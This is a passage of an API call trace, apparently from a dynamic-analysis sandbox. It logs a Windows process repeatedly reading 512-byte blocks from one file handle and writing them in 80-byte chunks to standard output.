lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.550] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.550] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.551] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.551] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.552] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.552] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.553] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.553] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.554] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.554] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.555] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.555] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.556] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.556] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 